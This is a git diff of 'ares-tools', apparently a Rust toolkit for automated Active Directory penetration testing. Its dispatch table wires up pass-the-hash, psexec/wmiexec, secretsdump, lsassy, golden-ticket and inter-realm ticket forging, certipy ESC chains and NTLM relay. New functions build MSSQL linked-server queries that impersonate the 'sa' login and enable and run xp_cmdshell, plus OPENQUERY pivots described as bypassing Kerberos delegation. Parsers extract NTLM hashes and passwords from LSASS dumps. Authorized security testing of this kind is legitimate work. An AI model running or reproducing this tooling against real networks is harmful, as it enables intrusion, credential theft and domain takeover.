"admin"}); @@ -358,6 +369,8 @@ mod tests { assert_eq!(extra_args, vec!["-hashes", ":aabbccdd"]); } + // --- psexec_kerberos --- + #[test] fn psexec_kerberos_target_format() { let args = json!({ @@ -432,6 +445,8 @@ mod tests { assert_eq!(optional_str(&args, "dc_ip"), Some("192.168.58.1")); } + // --- wmiexec --- + #[test] fn wmiexec_requires_target() { let args = json!({"username": "admin"}); @@ -451,6 +466,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- wmiexec_kerberos --- + #[test] fn wmiexec_kerberos_target_format() { let domain = "contoso.local"; @@ -472,6 +489,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec --- + #[test] fn smbexec_requires_target() { let args = json!({"username": "admin"}); @@ -491,6 +510,8 @@ mod tests { assert_eq!(command, "whoami"); } + // --- smbexec_kerberos --- + #[test] fn smbexec_kerberos_target_format() { let domain = "north.contoso.local"; @@ -503,6 +524,8 @@ mod tests { ); } + // --- evil_winrm --- + #[test] fn evil_winrm_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin"}); @@ -571,6 +594,8 @@ mod tests { assert!(used_flag.is_empty()); } + // --- xfreerdp --- + #[test] fn xfreerdp_target_format() { let target = "192.168.58.1"; @@ -621,6 +646,8 @@ mod tests { assert_eq!(auth_arg, "/pth:aabbccdd"); } + // --- ssh_with_password --- + #[test] fn ssh_user_host_format() { let username = "root"; @@ -667,6 +694,8 @@ mod tests { assert!(optional_str(&args, "port").is_none()); } + // --- secretsdump_kerberos --- + #[test] fn secretsdump_kerberos_target_format() { let domain = "contoso.local"; @@ -725,6 +754,8 @@ mod tests { assert!(required_str(&args, "ticket_path").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/kerberos.rs b/ares-tools/src/lateral/kerberos.rs index 5b042ea7..7a1cc884 100644 --- a/ares-tools/src/lateral/kerberos.rs +++ b/ares-tools/src/lateral/kerberos.rs @@ -123,6 +123,8 @@ mod tests 
{ assert!(optional_str(&args, "dc_ip").is_none()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/mssql.rs b/ares-tools/src/lateral/mssql.rs index bc6a9113..9f8e0bb6 100644 --- a/ares-tools/src/lateral/mssql.rs +++ b/ares-tools/src/lateral/mssql.rs @@ -98,15 +98,32 @@ pub async fn mssql_enum_linked_servers(args: &Value) -> Result { mssql_query(mssql_from_args(args)?, "EXEC sp_linkedservers;").await } +/// Wrap `inner_query` in a source-side `EXECUTE AS LOGIN` if requested. +/// +/// Cross-forest linked-server hops fail when the connecting principal can't +/// double-hop (Kerberos delegation/SID filtering). Two source-side workarounds: +/// - `EXECUTE AS LOGIN = 'sa'; ` — runs the hop under sa's mapped login +/// (requires SeImpersonatePrivilege or IMPERSONATE on the target login) +/// - `SELECT * FROM OPENQUERY(...)` — uses the linked-server's configured +/// `sp_addlinkedsrvlogin` mapping (separate path: see `mssql_openquery`) +fn wrap_execute_as(inner_query: &str, impersonate_user: Option<&str>) -> String { + match impersonate_user { + Some(user) => format!("EXECUTE AS LOGIN = '{user}'; {inner_query}"), + None => inner_query.to_string(), + } +} + /// Execute a query on a linked MSSQL server. 
/// /// Required args: `target`, `username`, `linked_server`, `query` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_exec_linked(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!("EXEC ('{query}') AT [{linked_server}];"); + let hop = format!("EXEC ('{query}') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -114,14 +131,16 @@ pub async fn mssql_exec_linked(args: &Value) -> Result { /// Enable xp_cmdshell on a linked MSSQL server. /// /// Required args: `target`, `username`, `linked_server` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; + let impersonate_user = optional_str(args, "impersonate_user"); - let full_query = format!( + let hop = format!( "EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; \ EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [{linked_server}];" ); + let full_query = wrap_execute_as(&hop, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -129,12 +148,35 @@ pub async fn mssql_linked_enable_xpcmdshell(args: &Value) -> Result /// Execute a command via xp_cmdshell on a linked MSSQL server. 
/// /// Required args: `target`, `username`, `linked_server`, `command` -/// Optional args: `password`, `domain`, `windows_auth` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` pub async fn mssql_linked_xpcmdshell(args: &Value) -> Result { let linked_server = required_str(args, "linked_server")?; let command = required_str(args, "command")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + let hop = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); + let full_query = wrap_execute_as(&hop, impersonate_user); + + mssql_query(mssql_from_args(args)?, &full_query).await +} - let full_query = format!("EXEC ('xp_cmdshell ''{command}''') AT [{linked_server}];"); +/// Query a linked MSSQL server via OPENQUERY using the linked server's +/// configured remote login (sp_addlinkedsrvlogin) — bypasses Kerberos +/// double-hop. This is the cross-forest pivot path when the connecting +/// principal cannot delegate but the linked server has an explicit login +/// mapping (e.g. `RPC OUT = ON` plus a stored credential). +/// +/// Required args: `target`, `username`, `linked_server`, `query` +/// Optional args: `password`, `domain`, `windows_auth`, `impersonate_user` +pub async fn mssql_openquery(args: &Value) -> Result { + let linked_server = required_str(args, "linked_server")?; + let query = required_str(args, "query")?; + let impersonate_user = optional_str(args, "impersonate_user"); + + // OPENQUERY's inner string uses single quotes; double any embedded ones. 
+ let escaped = query.replace('\'', "''"); + let openq = format!("SELECT * FROM OPENQUERY([{linked_server}], '{escaped}');"); + let full_query = wrap_execute_as(&openq, impersonate_user); mssql_query(mssql_from_args(args)?, &full_query).await } @@ -157,6 +199,8 @@ mod tests { use crate::credentials; use serde_json::json; + // --- mssql_from_args required fields --- + #[test] fn mssql_requires_target() { let args = json!({"username": "sa"}); @@ -187,6 +231,8 @@ mod tests { assert!(windows_auth); } + // --- mssql_base auth string via impacket_target --- + #[test] fn mssql_auth_string_with_domain_and_password() { let auth_str = @@ -206,12 +252,16 @@ mod tests { assert_eq!(auth_str, "CONTOSO/sa@192.168.58.1"); } + // --- mssql_command --- + #[test] fn mssql_command_requires_command() { let args = json!({"target": "192.168.58.1", "username": "sa"}); assert!(required_str(&args, "command").is_err()); } + // --- mssql_enable_xp_cmdshell --- + #[test] fn enable_xp_cmdshell_impersonate_query_format() { let user = "sa"; @@ -240,6 +290,8 @@ mod tests { assert!(!query.starts_with("EXECUTE AS LOGIN")); } + // --- mssql_impersonate --- + #[test] fn impersonate_query_format() { let impersonate_user = "sa"; @@ -268,6 +320,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_exec_linked --- + #[test] fn linked_server_query_format() { let linked_server = "SQL02"; @@ -296,6 +350,8 @@ mod tests { assert!(required_str(&args, "query").is_err()); } + // --- mssql_linked_enable_xpcmdshell --- + #[test] fn linked_enable_xpcmdshell_format() { let linked_server = "SQL02"; @@ -307,6 +363,8 @@ mod tests { assert!(full_query.contains("xp_cmdshell")); } + // --- mssql_linked_xpcmdshell --- + #[test] fn linked_xpcmdshell_format() { let linked_server = "SQL02"; @@ -325,6 +383,8 @@ mod tests { assert!(required_str(&args, "command").is_err()); } + // --- mssql_ntlm_coerce --- + #[test] fn ntlm_coerce_xp_dirtree_format() { let listener_ip = "192.168.58.5"; @@ -344,6 +404,8 
@@ mod tests { assert!(required_str(&args, "listener_ip").is_err()); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lateral/pth.rs b/ares-tools/src/lateral/pth.rs index 1d251bd3..0a89a787 100644 --- a/ares-tools/src/lateral/pth.rs +++ b/ares-tools/src/lateral/pth.rs @@ -110,6 +110,8 @@ mod tests { use crate::args::{optional_str, required_str}; use serde_json::json; + // --- pth_cred_string --- + #[test] fn cred_string_with_domain() { let result = pth_cred_string(Some("CONTOSO"), "admin", "aabbccdd"); @@ -128,6 +130,8 @@ mod tests { assert_eq!(result, "admin%aabbccdd"); } + // --- pth_winexe --- + #[test] fn pth_winexe_requires_target() { let args = json!({"username": "admin", "hash": "aabbccdd"}); @@ -159,6 +163,8 @@ mod tests { assert_eq!(format!("//{target}"), "//192.168.58.1"); } + // --- pth_smbclient --- + #[test] fn pth_smbclient_default_share() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -192,6 +198,8 @@ mod tests { assert_eq!(format!("//{target}/{share}"), "//192.168.58.1/C$"); } + // --- pth_rpcclient --- + #[test] fn pth_rpcclient_default_command() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -199,6 +207,8 @@ mod tests { assert_eq!(command, "getusername"); } + // --- pth_wmic --- + #[test] fn pth_wmic_default_query() { let args = json!({"target": "192.168.58.1", "username": "admin", "hash": "aa"}); @@ -239,6 +249,8 @@ mod tests { assert_eq!(cred, "CONTOSO/admin%aad3b435:aabbccdd"); } + // --- mock executor tests --- + use crate::executor::mock; #[tokio::test] diff --git a/ares-tools/src/lib.rs b/ares-tools/src/lib.rs index 46f90016..4dee3867 100644 --- a/ares-tools/src/lib.rs +++ b/ares-tools/src/lib.rs @@ -83,6 +83,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "adidnsdump" => recon::adidnsdump(arguments).await, "save_users_to_file" => recon::save_users_to_file(arguments).await, 
"smbclient_kerberos_shares" => recon::smbclient_kerberos_shares(arguments).await, + "ldap_acl_enumeration" => recon::ldap_acl_enumeration(arguments).await, // ── Credential Access ─────────────────────────────────────── "kerberoast" => credential_access::kerberoast(arguments).await, @@ -92,6 +93,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result } "secretsdump" => credential_access::secretsdump(arguments).await, "lsassy" => credential_access::lsassy(arguments).await, + "smb_login_check" => credential_access::smb_login_check(arguments).await, "domain_admin_checker" => credential_access::domain_admin_checker(arguments).await, "gpp_password_finder" => credential_access::gpp_password_finder(arguments).await, "sysvol_script_search" => credential_access::sysvol_script_search(arguments).await, @@ -135,6 +137,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result lateral::mssql_linked_enable_xpcmdshell(arguments).await } "mssql_linked_xpcmdshell" => lateral::mssql_linked_xpcmdshell(arguments).await, + "mssql_openquery" => lateral::mssql_openquery(arguments).await, "mssql_ntlm_coerce" => lateral::mssql_ntlm_coerce(arguments).await, // ── Privilege Escalation ──────────────────────────────────── @@ -144,6 +147,11 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "certipy_shadow" => privesc::certipy_shadow(arguments).await, "certipy_template_esc4" => privesc::certipy_template_esc4(arguments).await, "certipy_esc4_full_chain" => privesc::certipy_esc4_full_chain(arguments).await, + "certipy_ca" => privesc::certipy_ca(arguments).await, + "certipy_forge" => privesc::certipy_forge(arguments).await, + "certipy_retrieve" => privesc::certipy_retrieve(arguments).await, + "certipy_esc7_full_chain" => privesc::certipy_esc7_full_chain(arguments).await, + "certipy_relay" => privesc::certipy_relay(arguments).await, "find_delegation" => privesc::find_delegation(arguments).await, "s4u_attack" => privesc::s4u_attack(arguments).await, 
"generate_golden_ticket" => privesc::generate_golden_ticket(arguments).await, @@ -154,6 +162,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "raise_child" => privesc::raise_child(arguments).await, "extract_trust_key" => privesc::extract_trust_key(arguments).await, "create_inter_realm_ticket" => privesc::create_inter_realm_ticket(arguments).await, + "forge_inter_realm_and_dump" => privesc::forge_inter_realm_and_dump(arguments).await, "get_sid" => privesc::get_sid(arguments).await, "dnstool" => privesc::dnstool(arguments).await, "gmsa_dump_passwords" => privesc::gmsa_dump_passwords(arguments).await, @@ -187,6 +196,7 @@ pub async fn dispatch(tool_name: &str, arguments: &Value) -> Result "ntlmrelayx_to_adcs" => coercion::ntlmrelayx_to_adcs(arguments).await, "ntlmrelayx_to_smb" => coercion::ntlmrelayx_to_smb(arguments).await, "ntlmrelayx_multirelay" => coercion::ntlmrelayx_multirelay(arguments).await, + "relay_and_coerce" => coercion::relay_and_coerce(arguments).await, _ => Err(anyhow::anyhow!("unknown tool: {tool_name}")), } diff --git a/ares-tools/src/parsers/certipy.rs b/ares-tools/src/parsers/certipy.rs index 724f8e90..80f1ab0b 100644 --- a/ares-tools/src/parsers/certipy.rs +++ b/ares-tools/src/parsers/certipy.rs @@ -9,11 +9,22 @@ const ESC_TYPES: &[&str] = &[ ]; pub fn parse_certipy_find(output: &str, params: &Value) -> Vec { - let target_ip = params - .get("target") - .or_else(|| params.get("target_ip")) + // ca_host_ip is the ADCS CA server IP (where certs are enrolled). + // target/target_ip is the DC IP used for LDAP queries. + // For vuln target, prefer ca_host_ip so exploitation targets the CA, not the DC. 
+ let ca_host_ip = params + .get("ca_host_ip") .and_then(|v| v.as_str()) .unwrap_or(""); + let target_ip = if !ca_host_ip.is_empty() { + ca_host_ip + } else { + params + .get("target") + .or_else(|| params.get("target_ip")) + .and_then(|v| v.as_str()) + .unwrap_or("") + }; let domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -29,18 +40,24 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec<Value> { // Strategy 2: Look for "ESCn :" patterns (certipy find -vulnerable output) // These appear as "ESC1 : 'DOMAIN\\Group' can enroll..." for esc_type in ESC_TYPES { + let esc_upper = esc_type.to_uppercase(); let found = if has_vuln_header { - // Standard certipy output with vulnerability section - output_lower.contains(esc_type) + // Use word-boundary-aware matching to avoid false positives + // (e.g. "esc1" matching inside "esc13" or "esc15"). + // Certipy outputs "ESCn :" or "ESCn:" patterns. + output.contains(&format!("{esc_upper} :")) + || output.contains(&format!("{esc_upper}:")) + || output.contains(&format!("{esc_upper} ")) + || esc_word_boundary_match(&output_lower, esc_type) } else { // Also detect ESC patterns without the header — certipy sometimes // outputs vulnerability info inline with template details. // Look for "ESCn" followed by ":" or "vulnerability" on the same or // nearby lines.
- let esc_upper = esc_type.to_uppercase(); output.contains(&format!("{esc_upper} :")) || output.contains(&format!("{esc_upper}:")) - || (output_lower.contains(esc_type) && output_lower.contains("vulnerab")) + || (esc_word_boundary_match(&output_lower, esc_type) + && output_lower.contains("vulnerab")) }; if found { @@ -59,6 +76,9 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec<Value> { if let Some(ref tmpl) = template_name { details["template_name"] = json!(tmpl); } + if !ca_host_ip.is_empty() { + details["ca_host"] = json!(ca_host_ip); + } vulns.push(json!({ "vuln_id": format!("adcs_{}_{}", esc_type, target_ip), @@ -75,6 +95,23 @@ pub fn parse_certipy_find(output: &str, params: &Value) -> Vec<Value> { vulns } +/// Check if `esc_type` (e.g. "esc1") appears as a whole word in `text`. +/// Prevents "esc1" from matching inside "esc13" or "esc15". +fn esc_word_boundary_match(text: &str, esc_type: &str) -> bool { + let mut start = 0; + while let Some(pos) = text[start..].find(esc_type) { + let abs_pos = start + pos; + let end_pos = abs_pos + esc_type.len(); + // Check that the character after the match is not a digit + let after_ok = end_pos >= text.len() || !text.as_bytes()[end_pos].is_ascii_digit(); + if after_ok { + return true; + } + start = abs_pos + 1; + } + false +} + /// Extract CA name from certipy output. fn extract_ca_name(output: &str) -> Option<String> { for line in output.lines() { @@ -117,12 +154,14 @@ fn extract_template_for_esc(output: &str, esc_type: &str) -> Option<String> { /// Priority for ESC types (lower = more urgent).
fn esc_priority(esc_type: &str) -> i32 { match esc_type { - "esc1" | "esc6" => 1, // Direct enrollment → DA cert - "esc4" | "esc8" => 2, // Template abuse / relay - "esc2" | "esc3" => 3, // Certificate agent - "esc7" | "esc9" => 4, // ManageCA / UPN spoof - "esc5" => 5, // Golden cert (requires CA compromise first) - _ => 6, // ESC10-15 and unknown + "esc1" | "esc6" => 1, // Direct enrollment → DA cert + "esc4" | "esc8" => 2, // Template abuse / relay + "esc2" | "esc3" | "esc15" => 3, // Certificate agent / app policy OID + "esc7" | "esc9" | "esc10" => 4, // ManageCA / UPN spoof / weak mapping + "esc11" => 4, // RPC relay (needs coercion) + "esc13" => 4, // Issuance policy + "esc5" => 5, // Golden cert (requires CA compromise first) + _ => 6, // ESC14 and unknown } } @@ -237,12 +276,13 @@ mod tests { assert_eq!(esc_priority("esc8"), 2); assert_eq!(esc_priority("esc2"), 3); assert_eq!(esc_priority("esc3"), 3); + assert_eq!(esc_priority("esc15"), 3); assert_eq!(esc_priority("esc7"), 4); assert_eq!(esc_priority("esc9"), 4); + assert_eq!(esc_priority("esc10"), 4); + assert_eq!(esc_priority("esc11"), 4); + assert_eq!(esc_priority("esc13"), 4); assert_eq!(esc_priority("esc5"), 5); - assert_eq!(esc_priority("esc10"), 6); - assert_eq!(esc_priority("esc11"), 6); - assert_eq!(esc_priority("esc13"), 6); assert_eq!(esc_priority("unknown"), 6); } @@ -338,4 +378,48 @@ mod tests { assert_eq!(vulns.len(), 1); assert_eq!(vulns[0]["vuln_type"], "adcs_esc8"); } + + #[test] + fn parse_certipy_esc13_does_not_false_positive_esc1() { + // ESC13 should not trigger false positive for ESC1 + let output = "[!] Vulnerabilities\nESC13 : Issuance Policy linked to group"; + let params = json!({"target": "192.168.58.10"}); + let vulns = parse_certipy_find(output, &params); + assert_eq!(vulns.len(), 1); + assert_eq!(vulns[0]["vuln_type"], "adcs_esc13"); + } + + #[test] + fn parse_certipy_ca_host_ip_used_as_target() { + let output = "[!] 
 Vulnerabilities\nESC1 : enrollee supplies subject"; + let params = json!({ + "target_ip": "192.168.58.10", // DC IP + "ca_host_ip": "192.168.58.50", // CA IP + "domain": "contoso.local" + }); + let vulns = parse_certipy_find(output, &params); + assert_eq!(vulns.len(), 1); + // Should use ca_host_ip, not target_ip + assert_eq!(vulns[0]["target"], "192.168.58.50"); + assert_eq!(vulns[0]["vuln_id"], "adcs_esc1_192.168.58.50"); + assert_eq!(vulns[0]["details"]["ca_host"], "192.168.58.50"); + } + + #[test] + fn esc_word_boundary_match_basic() { + assert!(super::esc_word_boundary_match("esc1 : vulnerable", "esc1")); + assert!(super::esc_word_boundary_match("esc1:", "esc1")); + assert!(!super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc1" + )); + assert!(!super::esc_word_boundary_match( + "esc15 : vulnerable", + "esc1" + )); + assert!(super::esc_word_boundary_match( + "esc13 : vulnerable", + "esc13" + )); + } } diff --git a/ares-tools/src/parsers/credential_tools.rs b/ares-tools/src/parsers/credential_tools.rs index 3a0d7d60..5ec356e9 100644 --- a/ares-tools/src/parsers/credential_tools.rs +++ b/ares-tools/src/parsers/credential_tools.rs @@ -7,13 +7,43 @@ use std::sync::LazyLock; // ── Lsassy ────────────────────────────────────────────────────────────────── +/// Real ANSI escape sequences (e.g. `\x1b[1;33m`). +static ANSI_ESC_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\x1b\[[0-9;]*[a-zA-Z]").expect("ansi esc regex")); + +/// Bare-text ANSI leftovers when ESC bytes are stripped during transport. +/// Matches things like `[1;33m`, `[0m`, `[32m` — but NOT arbitrary bracketed +/// text like `[LSASSY]` or `[NT]`. +static ANSI_BARE_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\[\d+(?:;\d+)*m").expect("ansi bare regex")); + +/// Match the first plausibly-clean `DOMAIN\username` token in a line.
+/// +/// Domain: starts with alphanumeric, allows alphanumerics/`._-`, no spaces or +/// brackets — keeps us from capturing `"SMB 192.168.58.10 445 DC01 [+] contoso.local"` +/// as the "domain" when the real domain prefix appears later in the line. +/// +/// Captures: 1=domain, 2=username, 3=remainder of line. +static LSASSY_DOMAIN_USER_RE: LazyLock<Regex> = LazyLock::new(|| { + Regex::new(r"(?:^|[\s\]\)>])([A-Za-z0-9][A-Za-z0-9._-]*)\\([A-Za-z0-9._$@-]+)(.*)$") + .expect("lsassy domain\\user regex") +}); + +/// Match `[NT] <hash>` (with optional `[SHA1] <hash>` suffix) in lsassy output. +/// Captures: 1=NT hash (32 hex chars). +static LSASSY_NT_HASH_RE: LazyLock<Regex> = + LazyLock::new(|| Regex::new(r"\[NT\]\s+([0-9a-fA-F]{32})\b").expect("lsassy NT hash regex")); + /// Parse lsassy output for cleartext credentials and NTLM hashes. /// -/// Lsassy dumps credentials from LSASS memory: +/// Handles several output flavors: /// ```text -/// CONTOSO\alice.johnson Password123 -/// CONTOSO\bob.smith 31d6...hash... +/// CONTOSO\alice Password123 +/// CONTOSO\bob aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +/// SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\carol [NT] 31d6... [SHA1] f9e3... /// ``` +/// ANSI color codes (real ESC sequences and bare-text leftovers like `[1;33m`) +/// are stripped before parsing.
 pub fn parse_lsassy(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) { let default_domain = params.get("domain").and_then(|v| v.as_str()).unwrap_or(""); @@ -21,19 +51,15 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) { let mut creds = Vec::new(); for line in output.lines() { + let line = strip_ansi(line.trim()); let line = line.trim(); - // Skip noise lines - if line.is_empty() - || line.starts_with('[') - || line.starts_with("INFO") - || line.starts_with("WARNING") - || line.starts_with("ERROR") - || line.contains("authentication") - { + if line.is_empty() { + continue; + } + if is_lsassy_noise(line) { continue; } - // Try DOMAIN\username:password or DOMAIN\username password if let Some((domain, username, secret)) = parse_lsassy_line(line) { let domain = if domain.is_empty() { default_domain.to_string() @@ -65,35 +91,86 @@ pub fn parse_lsassy(output: &str, params: &Value) -> (Vec<Value>, Vec<Value>) { (hashes, creds) } +/// Strip ANSI color codes and bare-text leftovers (when ESC bytes were dropped). +fn strip_ansi(s: &str) -> String { + let s = ANSI_ESC_RE.replace_all(s, ""); + ANSI_BARE_RE.replace_all(&s, "").to_string() +} + +/// Identify lines that lsassy emits but contain no credential we can parse. +fn is_lsassy_noise(line: &str) -> bool { + line.starts_with("INFO") + || line.starts_with("WARNING") + || line.starts_with("ERROR") + || line.contains("authentication") + // Lines that are pure status (start with `[`/`(`) and contain no `\` + // can't carry a DOMAIN\user pair — skip them up-front.
+ || ((line.starts_with('[') || line.starts_with('(')) + && !line.contains('\\')) +} + fn parse_lsassy_line(line: &str) -> Option<(String, String, String)> { - // Format: DOMAIN\username password OR DOMAIN\username:password - if let Some(backslash_pos) = line.find('\\') { - let domain = line[..backslash_pos].trim().to_string(); - let rest = &line[backslash_pos + 1..]; - - // Try splitting on whitespace first (most common lsassy format) - // This must come before colon check because NTLM hashes contain colons - let parts: Vec<&str> = rest.splitn(2, char::is_whitespace).collect(); - if parts.len() == 2 && !parts[1].trim().is_empty() { - let username = parts[0].trim().to_string(); - let secret = parts[1].trim().to_string(); - if !username.is_empty() && !secret.is_empty() { - return Some((domain, username, secret)); + // Special-case `[NT] hash` form first — it's unambiguous and the regex + // anchors are friendlier to a clean DOMAIN\user lookahead. + if let Some(nt_caps) = LSASSY_NT_HASH_RE.captures(line) { + if let Some(caps) = LSASSY_DOMAIN_USER_RE.captures(line) { + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + if is_clean_domain(domain) && !username.is_empty() { + return Some(( + domain.to_string(), + username.to_string(), + nt_caps[1].to_string(), + )); } } + } - // Fallback: colon-separated (DOMAIN\username:password) - if let Some(colon_pos) = rest.find(':') { - let username = rest[..colon_pos].trim().to_string(); - let after_colon = rest[colon_pos + 1..].trim().to_string(); - if !username.is_empty() && !after_colon.is_empty() { - return Some((domain, username, after_colon)); - } + // General DOMAIN\user form: parse the first clean DOMAIN\user token, then + // pull a secret out of the remainder. 
+ let caps = LSASSY_DOMAIN_USER_RE.captures(line)?; + let domain = caps.get(1)?.as_str(); + let username = caps.get(2)?.as_str(); + let rest = caps.get(3)?.as_str(); + + if !is_clean_domain(domain) || username.is_empty() { + return None; + } + + // Colon-prefixed (DOMAIN\user:secret) — preserve full LM:NT pair. + if let Some(stripped) = rest.strip_prefix(':') { + let secret = stripped.trim(); + if !secret.is_empty() { + return Some((domain.to_string(), username.to_string(), secret.to_string())); + } + } + + // Whitespace-separated (DOMAIN\user secret). + let secret = rest.trim(); + if !secret.is_empty() { + // Take only the first whitespace-delimited token to avoid swallowing + // trailing `[SHA1] …` decorations into the password. + let first = secret.split_whitespace().next().unwrap_or(""); + if !first.is_empty() { + return Some((domain.to_string(), username.to_string(), first.to_string())); } } + None } +/// Validate a DOMAIN string looks like an AD domain prefix, not garbage. +fn is_clean_domain(d: &str) -> bool { + !d.is_empty() + && d.len() < 64 + && d.chars() + .all(|c| c.is_ascii_alphanumeric() || c == '.' || c == '-' || c == '_') + && d.chars() + .next() + .map(|c| c.is_ascii_alphanumeric()) + .unwrap_or(false) +} + fn looks_like_ntlm_hash(s: &str) -> bool { // NTLM hash: 32 hex chars, or LM:NT format (32:32) let s = s.trim(); @@ -577,4 +654,83 @@ _msdcs.contoso.local. CNAME dc01.contoso.local."; assert_eq!(creds[0]["username"], "alice"); assert_eq!(creds[0]["password"], "Password123"); } + + #[test] + fn lsassy_handles_nxc_prefix_with_nt_hash_marker() { + // Real lsassy-via-nxc line format: a transport prefix, then the + // credential block. Domain prefix appears mid-line, not at the start. 
+ let output = "\ +SMB 192.168.58.10 445 DC01 [LSASSY] CONTOSO\\Administrator [NT] 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1, "should pick up the [NT] hash"); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["username"], "Administrator"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_strips_real_ansi_escape_sequences() { + // Real ANSI from the wire — the parser must not see them. + let output = + "\x1b[1;33mCONTOSO\\alice\x1b[0m \x1b[1;32m[NT]\x1b[0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + } + + #[test] + fn lsassy_strips_bare_text_ansi_leftovers() { + // When ESC bytes are stripped during transport, the visible style + // codes (`[1;33m`, `[0m`) survive as bare text. Strip them too. + let output = "[1;33mCONTOSO\\alice[0m [1;32m[NT][0m 31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, _) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert_eq!(hashes[0]["username"], "alice"); + assert_eq!(hashes[0]["domain"], "CONTOSO"); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } + + #[test] + fn lsassy_rejects_garbage_domain_from_naive_first_backslash() { + // The pre-fix bug: nxc prefix has no backslash, but `contoso.local\Administrator:HASH` + // sits in the line. Naive first-backslash parsing wrongly stuffed the + // entire prefix ("SMB ... DC01 [+] contoso.local") into `domain`. + // The fix must extract a clean domain ("contoso.local") instead. 
+ let output = "\ +SMB 192.168.58.10 445 DC01 [+] contoso.local\\Administrator:31d6cfe0d16ae931b73c59d7e0c089c0"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["domain"], "contoso.local"); + assert_eq!(hashes[0]["username"], "Administrator"); + } + + #[test] + fn lsassy_rejects_path_like_backslashes() { + // Backslashes in Windows paths shouldn't be treated as DOMAIN\user. + // The token after `\` here is empty / has no secret following. + let output = "[*] Loading file C:\\Windows\\Temp\\dump.dmp"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert!(hashes.is_empty()); + assert!(creds.is_empty()); + } + + #[test] + fn lsassy_does_not_swallow_sha1_decoration_into_password() { + // Whitespace-separated form with `[SHA1] …` trailing decoration. + // The parser should pick the NT hash, not concatenate the rest. 
+ let output = "CONTOSO\\bob 31d6cfe0d16ae931b73c59d7e0c089c0 [SHA1] f9e37e83b83c47a93c2f09f66408631b16769e6a"; + let params = json!({"domain": "contoso.local"}); + let (hashes, creds) = parse_lsassy(output, ¶ms); + assert_eq!(hashes.len(), 1); + assert!(creds.is_empty()); + assert_eq!(hashes[0]["hash_value"], "31d6cfe0d16ae931b73c59d7e0c089c0"); + } } diff --git a/ares-tools/src/parsers/mod.rs b/ares-tools/src/parsers/mod.rs index 291ec55a..3f11668b 100644 --- a/ares-tools/src/parsers/mod.rs +++ b/ares-tools/src/parsers/mod.rs @@ -10,6 +10,7 @@ mod credential_tools; mod delegation; mod mssql; mod nmap; +mod ntsd; mod secrets; mod smb; mod spider; @@ -27,6 +28,7 @@ pub use credential_tools::{ pub use delegation::{extract_delegation_account, parse_delegation}; pub use mssql::{parse_mssql_impersonation, parse_mssql_linked_servers}; pub use nmap::{flush_nmap_host, parse_nmap_output}; +pub use ntsd::parse_acl_enumeration; pub use secrets::{parse_asrep_roast, parse_kerberoast, parse_secretsdump}; pub use smb::{parse_netexec_smb, 